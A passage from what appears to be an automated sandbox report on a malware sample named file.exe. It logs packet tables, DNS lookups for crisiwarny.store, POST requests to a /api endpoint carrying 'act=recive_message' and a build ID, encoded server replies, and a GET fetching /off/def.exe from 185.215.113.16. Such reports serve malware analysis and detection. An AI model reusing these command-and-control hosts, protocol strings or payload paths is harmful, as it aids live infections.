                                                                                                          Oct 27, 2024 13:03:02.397949934 CET44349731172.67.170.64192.168.2.4
                                                                                                          Oct 27, 2024 13:03:02.398207903 CET44349731172.67.170.64192.168.2.4
                                                                                                          Oct 27, 2024 13:03:02.399476051 CET49731443192.168.2.4172.67.170.64
                                                                                                          Oct 27, 2024 13:03:02.399504900 CET49731443192.168.2.4172.67.170.64
                                                                                                          Oct 27, 2024 13:03:02.399538040 CET44349731172.67.170.64192.168.2.4
                                                                                                          Oct 27, 2024 13:03:02.892185926 CET44349731172.67.170.64192.168.2.4
                                                                                                          Oct 27, 2024 13:03:02.892321110 CET44349731172.67.170.64192.168.2.4
                                                                                                          Oct 27, 2024 13:03:02.892395973 CET49731443192.168.2.4172.67.170.64
                                                                                                          Oct 27, 2024 13:03:02.892457962 CET44349731172.67.170.64192.168.2.4
                                                                                                          Oct 27, 2024 13:03:02.892642021 CET44349731172.67.170.64192.168.2.4
                                                                                                          Oct 27, 2024 13:03:02.892705917 CET49731443192.168.2.4172.67.170.64
                                                                                                          Oct 27, 2024 13:03:02.892720938 CET44349731172.67.170.64192.168.2.4
                                                                                                          Oct 27, 2024 13:03:02.892822981 CET44349731172.67.170.64192.168.2.4
                                                                                                          Oct 27, 2024 13:03:02.892874956 CET49731443192.168.2.4172.67.170.64
                                                                                                          Oct 27, 2024 13:03:02.892887115 CET44349731172.67.170.64192.168.2.4
                                                                                                          Oct 27, 2024 13:03:02.892988920 CET44349731172.67.170.64192.168.2.4
                                                                                                          Oct 27, 2024 13:03:02.893048048 CET49731443192.168.2.4172.67.170.64
                                                                                                          Oct 27, 2024 13:03:02.893059969 CET44349731172.67.170.64192.168.2.4
                                                                                                          Oct 27, 2024 13:03:02.942641020 CET49731443192.168.2.4172.67.170.64
                                                                                                          Oct 27, 2024 13:03:02.942672014 CET44349731172.67.170.64192.168.2.4
                                                                                                          Oct 27, 2024 13:03:02.989648104 CET49731443192.168.2.4172.67.170.64
                                                                                                          Oct 27, 2024 13:03:03.009994984 CET44349731172.67.170.64192.168.2.4
                                                                                                          Oct 27, 2024 13:03:03.010180950 CET44349731172.67.170.64192.168.2.4
                                                                                                          Oct 27, 2024 13:03:03.010270119 CET49731443192.168.2.4172.67.170.64
                                                                                                          Oct 27, 2024 13:03:03.010298967 CET44349731172.67.170.64192.168.2.4
                                                                                                          Oct 27, 2024 13:03:03.010401011 CET44349731172.67.170.64192.168.2.4
                                                                                                          Oct 27, 2024 13:03:03.010485888 CET49731443192.168.2.4172.67.170.64
                                                                                                          Oct 27, 2024 13:03:03.010498047 CET44349731172.67.170.64192.168.2.4
                                                                                                          Oct 27, 2024 13:03:03.010644913 CET44349731172.67.170.64192.168.2.4
                                                                                                          Oct 27, 2024 13:03:03.010709047 CET49731443192.168.2.4172.67.170.64
                                                                                                          Oct 27, 2024 13:03:03.010904074 CET49731443192.168.2.4172.67.170.64
                                                                                                          Oct 27, 2024 13:03:03.010943890 CET44349731172.67.170.64192.168.2.4
                                                                                                          Oct 27, 2024 13:03:03.010971069 CET49731443192.168.2.4172.67.170.64
                                                                                                          Oct 27, 2024 13:03:03.010984898 CET44349731172.67.170.64192.168.2.4
                                                                                                          Oct 27, 2024 13:03:03.135428905 CET49732443192.168.2.4172.67.170.64
                                                                                                          Oct 27, 2024 13:03:03.135490894 CET44349732172.67.170.64192.168.2.4
                                                                                                          Oct 27, 2024 13:03:03.135591984 CET49732443192.168.2.4172.67.170.64
                                                                                                          Oct 27, 2024 13:03:03.136061907 CET49732443192.168.2.4172.67.170.64
                                                                                                          Oct 27, 2024 13:03:03.136075974 CET44349732172.67.170.64192.168.2.4
                                                                                                          Oct 27, 2024 13:03:03.736170053 CET44349732172.67.170.64192.168.2.4
                                                                                                          Oct 27, 2024 13:03:03.736398935 CET49732443192.168.2.4172.67.170.64
                                                                                                          Oct 27, 2024 13:03:03.737991095 CET49732443192.168.2.4172.67.170.64
                                                                                                          Oct 27, 2024 13:03:03.738023043 CET44349732172.67.170.64192.168.2.4
                                                                                                          Oct 27, 2024 13:03:03.738279104 CET44349732172.67.170.64192.168.2.4
                                                                                                          Oct 27, 2024 13:03:03.739775896 CET49732443192.168.2.4172.67.170.64
                                                                                                          Oct 27, 2024 13:03:03.739955902 CET49732443192.168.2.4172.67.170.64
                                                                                                          Oct 27, 2024 13:03:03.739990950 CET44349732172.67.170.64192.168.2.4
                                                                                                          Oct 27, 2024 13:03:03.740093946 CET49732443192.168.2.4172.67.170.64
                                                                                                          Oct 27, 2024 13:03:03.740109921 CET44349732172.67.170.64192.168.2.4
                                                                                                          Oct 27, 2024 13:03:04.583930016 CET44349732172.67.170.64192.168.2.4
                                                                                                          Oct 27, 2024 13:03:04.584032059 CET44349732172.67.170.64192.168.2.4
                                                                                                          Oct 27, 2024 13:03:04.584192991 CET49732443192.168.2.4172.67.170.64
                                                                                                          Oct 27, 2024 13:03:04.584259033 CET49732443192.168.2.4172.67.170.64
                                                                                                          Oct 27, 2024 13:03:04.584275961 CET44349732172.67.170.64192.168.2.4
                                                                                                          Oct 27, 2024 13:03:04.653855085 CET49733443192.168.2.4172.67.170.64
                                                                                                          Oct 27, 2024 13:03:04.653908014 CET44349733172.67.170.64192.168.2.4
                                                                                                          Oct 27, 2024 13:03:04.653987885 CET49733443192.168.2.4172.67.170.64
                                                                                                          Oct 27, 2024 13:03:04.654357910 CET49733443192.168.2.4172.67.170.64
                                                                                                          Oct 27, 2024 13:03:04.654369116 CET44349733172.67.170.64192.168.2.4
                                                                                                          Oct 27, 2024 13:03:05.287146091 CET44349733172.67.170.64192.168.2.4
                                                                                                          Oct 27, 2024 13:03:05.287273884 CET49733443192.168.2.4172.67.170.64
                                                                                                          Oct 27, 2024 13:03:05.288634062 CET49733443192.168.2.4172.67.170.64
                                                                                                          Oct 27, 2024 13:03:05.288644075 CET44349733172.67.170.64192.168.2.4
                                                                                                          Oct 27, 2024 13:03:05.289671898 CET44349733172.67.170.64192.168.2.4
                                                                                                          Oct 27, 2024 13:03:05.291023970 CET49733443192.168.2.4172.67.170.64
                                                                                                          Oct 27, 2024 13:03:05.291151047 CET49733443192.168.2.4172.67.170.64
                                                                                                          Oct 27, 2024 13:03:05.291187048 CET44349733172.67.170.64192.168.2.4
                                                                                                          Oct 27, 2024 13:03:05.993275881 CET44349733172.67.170.64192.168.2.4
                                                                                                          Oct 27, 2024 13:03:05.993506908 CET44349733172.67.170.64192.168.2.4
                                                                                                          Oct 27, 2024 13:03:05.993613958 CET49733443192.168.2.4172.67.170.64
                                                                                                          Oct 27, 2024 13:03:05.993659019 CET49733443192.168.2.4172.67.170.64
                                                                                                          Oct 27, 2024 13:03:05.993684053 CET44349733172.67.170.64192.168.2.4
                                                                                                          Oct 27, 2024 13:03:06.196243048 CET49734443192.168.2.4172.67.170.64
                                                                                                          Oct 27, 2024 13:03:06.196362972 CET44349734172.67.170.64192.168.2.4
                                                                                                          Oct 27, 2024 13:03:06.196521997 CET49734443192.168.2.4172.67.170.64
                                                                                                          Oct 27, 2024 13:03:06.196829081 CET49734443192.168.2.4172.67.170.64
                                                                                                          Oct 27, 2024 13:03:06.196863890 CET44349734172.67.170.64192.168.2.4
                                                                                                          Oct 27, 2024 13:03:06.811537027 CET44349734172.67.170.64192.168.2.4
                                                                                                          Oct 27, 2024 13:03:06.811786890 CET49734443192.168.2.4172.67.170.64
                                                                                                          Oct 27, 2024 13:03:06.812906027 CET49734443192.168.2.4172.67.170.64
                                                                                                          Oct 27, 2024 13:03:06.812941074 CET44349734172.67.170.64192.168.2.4
                                                                                                          Oct 27, 2024 13:03:06.813168049 CET44349734172.67.170.64192.168.2.4
                                                                                                          Oct 27, 2024 13:03:06.814279079 CET49734443192.168.2.4172.67.170.64
                                                                                                          Oct 27, 2024 13:03:06.814418077 CET49734443192.168.2.4172.67.170.64
                                                                                                          Oct 27, 2024 13:03:06.814465046 CET44349734172.67.170.64192.168.2.4
                                                                                                          Oct 27, 2024 13:03:06.814553976 CET49734443192.168.2.4172.67.170.64
                                                                                                          Oct 27, 2024 13:03:06.814580917 CET44349734172.67.170.64192.168.2.4
                                                                                                          Oct 27, 2024 13:03:07.471227884 CET44349734172.67.170.64192.168.2.4
                                                                                                          Oct 27, 2024 13:03:07.471524000 CET44349734172.67.170.64192.168.2.4
                                                                                                          Oct 27, 2024 13:03:07.471687078 CET49734443192.168.2.4172.67.170.64
                                                                                                          Oct 27, 2024 13:03:07.471687078 CET49734443192.168.2.4172.67.170.64
                                                                                                          Oct 27, 2024 13:03:07.812846899 CET49735443192.168.2.4172.67.170.64
                                                                                                          Oct 27, 2024 13:03:07.812895060 CET44349735172.67.170.64192.168.2.4
                                                                                                          Oct 27, 2024 13:03:07.812982082 CET49735443192.168.2.4172.67.170.64
                                                                                                          Oct 27, 2024 13:03:07.813364983 CET49735443192.168.2.4172.67.170.64
                                                                                                          Oct 27, 2024 13:03:07.813375950 CET44349735172.67.170.64192.168.2.4
                                                                                                          Oct 27, 2024 13:03:08.436841965 CET44349735172.67.170.64192.168.2.4
                                                                                                          Oct 27, 2024 13:03:08.436914921 CET49735443192.168.2.4172.67.170.64
                                                                                                          Oct 27, 2024 13:03:08.438311100 CET49735443192.168.2.4172.67.170.64
                                                                                                          Oct 27, 2024 13:03:08.438323975 CET44349735172.67.170.64192.168.2.4
                                                                                                          Oct 27, 2024 13:03:08.438652992 CET44349735172.67.170.64192.168.2.4
                                                                                                          Oct 27, 2024 13:03:08.439954996 CET49735443192.168.2.4172.67.170.64
                                                                                                          Oct 27, 2024 13:03:08.440047026 CET49735443192.168.2.4172.67.170.64
                                                                                                          Oct 27, 2024 13:03:08.440053940 CET44349735172.67.170.64192.168.2.4
                                                                                                          Oct 27, 2024 13:03:09.964402914 CET44349735172.67.170.64192.168.2.4
                                                                                                          Oct 27, 2024 13:03:09.964755058 CET49735443192.168.2.4172.67.170.64
                                                                                                          Oct 27, 2024 13:03:10.507086992 CET49736443192.168.2.4172.67.170.64
                                                                                                          Oct 27, 2024 13:03:10.507148981 CET44349736172.67.170.64192.168.2.4
                                                                                                          Oct 27, 2024 13:03:10.507251978 CET49736443192.168.2.4172.67.170.64
                                                                                                          Oct 27, 2024 13:03:10.507625103 CET49736443192.168.2.4172.67.170.64
                                                                                                          Oct 27, 2024 13:03:10.507642984 CET44349736172.67.170.64192.168.2.4
                                                                                                          Oct 27, 2024 13:03:11.127670050 CET44349736172.67.170.64192.168.2.4
                                                                                                          Oct 27, 2024 13:03:11.127758980 CET49736443192.168.2.4172.67.170.64
                                                                                                          Oct 27, 2024 13:03:11.129225016 CET49736443192.168.2.4172.67.170.64
                                                                                                          Oct 27, 2024 13:03:11.129255056 CET44349736172.67.170.64192.168.2.4
                                                                                                          Oct 27, 2024 13:03:11.129606009 CET44349736172.67.170.64192.168.2.4
                                                                                                          Oct 27, 2024 13:03:11.131072044 CET49736443192.168.2.4172.67.170.64
                                                                                                          Oct 27, 2024 13:03:11.131865978 CET49736443192.168.2.4172.67.170.64
                                                                                                          Oct 27, 2024 13:03:11.131918907 CET44349736172.67.170.64192.168.2.4
                                                                                                          Oct 27, 2024 13:03:11.132019997 CET49736443192.168.2.4172.67.170.64
                                                                                                          Oct 27, 2024 13:03:11.132066965 CET44349736172.67.170.64192.168.2.4
                                                                                                          Oct 27, 2024 13:03:11.132199049 CET49736443192.168.2.4172.67.170.64
                                                                                                          Oct 27, 2024 13:03:11.132268906 CET44349736172.67.170.64192.168.2.4
                                                                                                          Oct 27, 2024 13:03:11.132424116 CET49736443192.168.2.4172.67.170.64
                                                                                                          Oct 27, 2024 13:03:11.132488012 CET44349736172.67.170.64192.168.2.4
                                                                                                          Oct 27, 2024 13:03:11.132606983 CET49736443192.168.2.4172.67.170.64
                                                                                                          Oct 27, 2024 13:03:11.132653952 CET44349736172.67.170.64192.168.2.4
                                                                                                          Oct 27, 2024 13:03:11.132859945 CET49736443192.168.2.4172.67.170.64
                                                                                                          Oct 27, 2024 13:03:11.132914066 CET44349736172.67.170.64192.168.2.4
                                                                                                          Oct 27, 2024 13:03:11.132931948 CET49736443192.168.2.4172.67.170.64
                                                                                                          Oct 27, 2024 13:03:11.132957935 CET44349736172.67.170.64192.168.2.4
                                                                                                          Oct 27, 2024 13:03:11.133068085 CET49736443192.168.2.4172.67.170.64
                                                                                                          Oct 27, 2024 13:03:11.133115053 CET44349736172.67.170.64192.168.2.4
                                                                                                          Oct 27, 2024 13:03:11.133157015 CET49736443192.168.2.4172.67.170.64
                                                                                                          Oct 27, 2024 13:03:11.133241892 CET49736443192.168.2.4172.67.170.64
                                                                                                          Oct 27, 2024 13:03:11.133294106 CET49736443192.168.2.4172.67.170.64
                                                                                                          Oct 27, 2024 13:03:11.143738031 CET44349736172.67.170.64192.168.2.4
                                                                                                          Oct 27, 2024 13:03:11.143904924 CET49736443192.168.2.4172.67.170.64
                                                                                                          Oct 27, 2024 13:03:11.143951893 CET49736443192.168.2.4172.67.170.64
                                                                                                          Oct 27, 2024 13:03:11.143951893 CET44349736172.67.170.64192.168.2.4
                                                                                                          Oct 27, 2024 13:03:11.143985033 CET49736443192.168.2.4172.67.170.64
                                                                                                          Oct 27, 2024 13:03:11.143987894 CET44349736172.67.170.64192.168.2.4
                                                                                                          Oct 27, 2024 13:03:11.144013882 CET49736443192.168.2.4172.67.170.64
                                                                                                          Oct 27, 2024 13:03:11.144030094 CET44349736172.67.170.64192.168.2.4
                                                                                                          Oct 27, 2024 13:03:11.144035101 CET49736443192.168.2.4172.67.170.64
                                                                                                          Oct 27, 2024 13:03:11.144079924 CET44349736172.67.170.64192.168.2.4
                                                                                                          Oct 27, 2024 13:03:38.275330067 CET44349736172.67.170.64192.168.2.4
                                                                                                          Oct 27, 2024 13:03:38.275412083 CET44349736172.67.170.64192.168.2.4
                                                                                                          Oct 27, 2024 13:03:38.275535107 CET49736443192.168.2.4172.67.170.64
                                                                                                          Oct 27, 2024 13:03:38.275753021 CET49736443192.168.2.4172.67.170.64
                                                                                                          Oct 27, 2024 13:03:38.275769949 CET44349736172.67.170.64192.168.2.4
                                                                                                          Oct 27, 2024 13:03:38.350856066 CET49701443192.168.2.4172.67.170.64
                                                                                                          Oct 27, 2024 13:03:38.350908995 CET44349701172.67.170.64192.168.2.4
                                                                                                          Oct 27, 2024 13:03:38.350990057 CET49701443192.168.2.4172.67.170.64
                                                                                                          Oct 27, 2024 13:03:38.351264954 CET49701443192.168.2.4172.67.170.64
                                                                                                          Oct 27, 2024 13:03:38.351279974 CET44349701172.67.170.64192.168.2.4
                                                                                                          Oct 27, 2024 13:03:38.953166008 CET44349701172.67.170.64192.168.2.4
                                                                                                          Oct 27, 2024 13:03:38.953277111 CET49701443192.168.2.4172.67.170.64
                                                                                                          Oct 27, 2024 13:03:38.954936028 CET49701443192.168.2.4172.67.170.64
                                                                                                          Oct 27, 2024 13:03:38.954950094 CET44349701172.67.170.64192.168.2.4
                                                                                                          Oct 27, 2024 13:03:38.955218077 CET44349701172.67.170.64192.168.2.4
                                                                                                          Oct 27, 2024 13:03:38.964051962 CET49701443192.168.2.4172.67.170.64
                                                                                                          Oct 27, 2024 13:03:38.964083910 CET49701443192.168.2.4172.67.170.64
                                                                                                          Oct 27, 2024 13:03:38.964140892 CET44349701172.67.170.64192.168.2.4
                                                                                                          Oct 27, 2024 13:03:39.473608971 CET44349701172.67.170.64192.168.2.4
                                                                                                          Oct 27, 2024 13:03:39.473716974 CET44349701172.67.170.64192.168.2.4
                                                                                                          Oct 27, 2024 13:03:39.473866940 CET49701443192.168.2.4172.67.170.64
                                                                                                          Oct 27, 2024 13:03:39.474292040 CET49701443192.168.2.4172.67.170.64
                                                                                                          Oct 27, 2024 13:03:39.474318027 CET44349701172.67.170.64192.168.2.4
                                                                                                          Oct 27, 2024 13:03:39.474343061 CET49701443192.168.2.4172.67.170.64
                                                                                                          Oct 27, 2024 13:03:39.474351883 CET44349701172.67.170.64192.168.2.4
                                                                                                          Oct 27, 2024 13:03:39.477107048 CET4970280192.168.2.4185.215.113.16
                                                                                                          Oct 27, 2024 13:03:39.482537985 CET8049702185.215.113.16192.168.2.4
                                                                                                          Oct 27, 2024 13:03:39.482618093 CET4970280192.168.2.4185.215.113.16
                                                                                                          Oct 27, 2024 13:03:39.482764959 CET4970280192.168.2.4185.215.113.16
                                                                                                          Oct 27, 2024 13:03:39.488646984 CET8049702185.215.113.16192.168.2.4
                                                                                                          Oct 27, 2024 13:03:40.380479097 CET4970280192.168.2.4185.215.113.16

                                                                                                          UDP Packets

                                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                                          Oct 27, 2024 13:03:00.400051117 CET6152253192.168.2.41.1.1.1
                                                                                                          Oct 27, 2024 13:03:00.409723997 CET53615221.1.1.1192.168.2.4
                                                                                                          Oct 27, 2024 13:03:00.414021015 CET5300053192.168.2.41.1.1.1
                                                                                                          Oct 27, 2024 13:03:00.432473898 CET53530001.1.1.1192.168.2.4
                                                                                                          Oct 27, 2024 13:03:31.606787920 CET5364803162.159.36.2192.168.2.4
                                                                                                          Oct 27, 2024 13:03:32.231959105 CET6188153192.168.2.41.1.1.1
                                                                                                          Oct 27, 2024 13:03:32.246361971 CET53618811.1.1.1192.168.2.4
                                                                                                          Oct 27, 2024 13:03:38.336869001 CET6025953192.168.2.41.1.1.1
                                                                                                          Oct 27, 2024 13:03:38.347940922 CET53602591.1.1.1192.168.2.4

                                                                                                          DNS Queries

                                                                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                          Oct 27, 2024 13:03:00.400051117 CET192.168.2.41.1.1.10xe9e6Standard query (0)presticitpo.storeA (IP address)IN (0x0001)false
                                                                                                          Oct 27, 2024 13:03:00.414021015 CET192.168.2.41.1.1.10xb3cStandard query (0)crisiwarny.storeA (IP address)IN (0x0001)false
                                                                                                          Oct 27, 2024 13:03:32.231959105 CET192.168.2.41.1.1.10x1d31Standard query (0)206.23.85.13.in-addr.arpaPTR (Pointer record)IN (0x0001)false
                                                                                                          Oct 27, 2024 13:03:38.336869001 CET192.168.2.41.1.1.10x3cc3Standard query (0)crisiwarny.storeA (IP address)IN (0x0001)false

                                                                                                          DNS Answers

                                                                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                          Oct 27, 2024 13:03:00.409723997 CET1.1.1.1192.168.2.40xe9e6Name error (3)presticitpo.storenonenoneA (IP address)IN (0x0001)false
                                                                                                          Oct 27, 2024 13:03:00.432473898 CET1.1.1.1192.168.2.40xb3cNo error (0)crisiwarny.store172.67.170.64A (IP address)IN (0x0001)false
                                                                                                          Oct 27, 2024 13:03:00.432473898 CET1.1.1.1192.168.2.40xb3cNo error (0)crisiwarny.store104.21.95.91A (IP address)IN (0x0001)false
                                                                                                          Oct 27, 2024 13:03:32.246361971 CET1.1.1.1192.168.2.40x1d31Name error (3)206.23.85.13.in-addr.arpanonenonePTR (Pointer record)IN (0x0001)false
                                                                                                          Oct 27, 2024 13:03:38.347940922 CET1.1.1.1192.168.2.40x3cc3No error (0)crisiwarny.store172.67.170.64A (IP address)IN (0x0001)false
                                                                                                          Oct 27, 2024 13:03:38.347940922 CET1.1.1.1192.168.2.40x3cc3No error (0)crisiwarny.store104.21.95.91A (IP address)IN (0x0001)false

                                                                                                          HTTP Request Dependency Graph

                                                                                                          • crisiwarny.store
                                                                                                          • 185.215.113.16

                                                                                                          HTTP Packets

                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          0192.168.2.449702185.215.113.16807472C:\Users\user\Desktop\file.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Oct 27, 2024 13:03:39.482764959 CET200OUTGET /off/def.exe HTTP/1.1
                                                                                                          Connection: Keep-Alive
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                          Host: 185.215.113.16


                                                                                                          HTTPS Proxied Packets

                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          0192.168.2.449730172.67.170.644437472C:\Users\user\Desktop\file.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2024-10-27 12:03:01 UTC263OUTPOST /api HTTP/1.1
                                                                                                          Connection: Keep-Alive
                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                          Content-Length: 8
                                                                                                          Host: crisiwarny.store
                                                                                                          2024-10-27 12:03:01 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                                          Data Ascii: act=life
                                                                                                          2024-10-27 12:03:01 UTC1015INHTTP/1.1 200 OK
                                                                                                          Date: Sun, 27 Oct 2024 12:03:01 GMT
                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                          Transfer-Encoding: chunked
                                                                                                          Connection: close
                                                                                                          Set-Cookie: PHPSESSID=pbbc0r7ugvdv96s29gcm3tm21k; expires=Thu, 20 Feb 2025 05:49:40 GMT; Max-Age=9999999; path=/
                                                                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                                                                          Pragma: no-cache
                                                                                                          cf-cache-status: DYNAMIC
                                                                                                          vary: accept-encoding
                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=K6p6gXrHjssU7bi6s0MsniGmq1rT4D5B47PqNdPihihxaoW4B%2Bfjv4ZHYHpG%2BE%2FfT7DgHEX8wBEuL%2BCMY5Dtvz%2Bm%2BEF84BVUVgo8RKtI7uXVXybLGmC7AzJm%2FXxvEA0aR7VP"}],"group":"cf-nel","max_age":604800}
                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 8d928a5d083f6b35-DFW
                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1884&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2839&recv_bytes=907&delivery_rate=1519412&cwnd=247&unsent_bytes=0&cid=4a53e3c65d7f8d95&ts=650&x=0"
                                                                                                          2024-10-27 12:03:01 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                                          Data Ascii: 2ok
                                                                                                          2024-10-27 12:03:01 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                          Data Ascii: 0


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          1192.168.2.449731172.67.170.644437472C:\Users\user\Desktop\file.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2024-10-27 12:03:02 UTC264OUTPOST /api HTTP/1.1
                                                                                                          Connection: Keep-Alive
                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                          Content-Length: 52
                                                                                                          Host: crisiwarny.store
                                                                                                          2024-10-27 12:03:02 UTC52OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 34 53 44 30 79 34 2d 2d 6c 65 67 65 6e 64 61 72 79 79 26 6a 3d
                                                                                                          Data Ascii: act=recive_message&ver=4.0&lid=4SD0y4--legendaryy&j=
                                                                                                          2024-10-27 12:03:02 UTC1007INHTTP/1.1 200 OK
                                                                                                          Date: Sun, 27 Oct 2024 12:03:02 GMT
                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                          Transfer-Encoding: chunked
                                                                                                          Connection: close
                                                                                                          Set-Cookie: PHPSESSID=0d1o7cq5n9cjignicdd0u0n27s; expires=Thu, 20 Feb 2025 05:49:41 GMT; Max-Age=9999999; path=/
                                                                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                                                                          Pragma: no-cache
                                                                                                          cf-cache-status: DYNAMIC
                                                                                                          vary: accept-encoding
                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=D3Bv%2BkHZPzuPrtTaL4I9BhZqtWWzq9PMB0ewtFsbDopcyetDN0wZ2GZlkDb6maITq65R05%2FKqb1UZqk6soozzRRHAPtV7MbPUgve5sAOptX3egITmbZiXMkkMeuM5WRtTjX%2F"}],"group":"cf-nel","max_age":604800}
                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 8d928a64683b467d-DFW
                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1774&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2837&recv_bytes=952&delivery_rate=1551151&cwnd=250&unsent_bytes=0&cid=7f4ef2b48e6f1643&ts=513&x=0"
                                                                                                          2024-10-27 12:03:02 UTC362INData Raw: 32 35 38 64 0d 0a 68 52 6d 74 74 36 51 65 37 37 4a 78 6a 55 78 46 4c 56 38 71 30 78 73 73 6f 73 35 73 63 43 31 6b 74 41 57 53 4f 50 59 2f 56 47 62 2b 4f 39 75 56 6e 69 72 44 6b 41 4c 6f 62 6e 39 5a 4c 56 2b 32 4e 77 37 44 71 6b 35 4b 53 77 58 59 64 76 63 55 31 45 6b 35 52 4c 39 2f 7a 4e 76 58 65 38 4f 51 46 50 56 75 66 33 59 6b 43 4c 5a 31 44 70 6a 73 43 52 70 50 42 64 68 6e 38 31 4f 5a 54 7a 67 46 37 58 58 4b 33 38 46 39 69 39 4d 64 34 43 6b 67 53 44 35 41 76 58 4a 42 79 71 4e 4f 58 41 38 42 7a 69 65 6f 47 72 74 61 49 41 66 49 65 4e 37 63 68 6d 50 44 79 56 50 6f 49 6d 63 58 66 55 75 32 65 55 44 45 71 67 63 59 52 51 7a 51 5a 76 5a 53 68 6c 59 79 44 75 31 37 79 64 37 4c 64 4a 2f 65 46 2b 63 69 4a 6b 49 2b 43 50 38 35 53 64 6a 73 56 6c 49 63 4e 4e 56 32 34
                                                                                                          Data Ascii: 258dhRmtt6Qe77JxjUxFLV8q0xssos5scC1ktAWSOPY/VGb+O9uVnirDkALobn9ZLV+2Nw7Dqk5KSwXYdvcU1Ek5RL9/zNvXe8OQFPVuf3YkCLZ1DpjsCRpPBdhn81OZTzgF7XXK38F9i9Md4CkgSD5AvXJByqNOXA8BzieoGrtaIAfIeN7chmPDyVPoImcXfUu2eUDEqgcYRQzQZvZShlYyDu17yd7LdJ/eF+ciJkI+CP85SdjsVlIcNNV24
                                                                                                          2024-10-27 12:03:02 UTC1369INData Raw: 49 6c 30 32 51 62 78 30 54 73 32 6d 41 52 46 50 41 64 78 74 2f 31 43 51 55 44 73 43 35 33 75 50 6d 34 5a 37 6c 5a 42 4c 72 77 30 69 58 7a 70 45 70 7a 74 30 67 4c 4e 41 43 77 38 42 32 69 65 6f 47 70 78 59 4e 51 66 73 64 4d 7a 64 7a 57 36 4e 77 68 58 69 4b 7a 56 4a 4f 45 61 37 65 6c 7a 4b 6f 67 67 52 52 67 33 66 59 76 64 65 31 42 4e 32 41 2f 38 37 6c 35 58 6e 63 59 62 63 47 66 67 75 5a 31 42 7a 55 66 46 2b 51 6f 44 30 54 68 5a 4f 41 74 64 6a 2f 6c 53 51 55 54 41 4b 36 6e 54 4a 33 38 5a 37 68 39 67 62 37 69 4d 73 51 44 31 4e 76 48 31 49 7a 4b 30 4c 55 67 46 47 30 58 2b 77 41 74 52 7a 4d 51 66 31 4f 66 72 57 79 48 4b 4b 78 6c 50 77 59 44 34 50 4f 6b 54 78 49 51 37 4f 71 51 45 41 54 68 54 54 61 65 4a 57 6b 56 73 37 42 2b 6c 37 79 74 4c 4c 63 6f 76 58 45 4f 63
                                                                                                          Data Ascii: Il02Qbx0Ts2mARFPAdxt/1CQUDsC53uPm4Z7lZBLrw0iXzpEpzt0gLNACw8B2ieoGpxYNQfsdMzdzW6NwhXiKzVJOEa7elzKoggRRg3fYvde1BN2A/87l5XncYbcGfguZ1BzUfF+QoD0ThZOAtdj/lSQUTAK6nTJ38Z7h9gb7iMsQD1NvH1IzK0LUgFG0X+wAtRzMQf1OfrWyHKKxlPwYD4POkTxIQ7OqQEAThTTaeJWkVs7B+l7ytLLcovXEOc
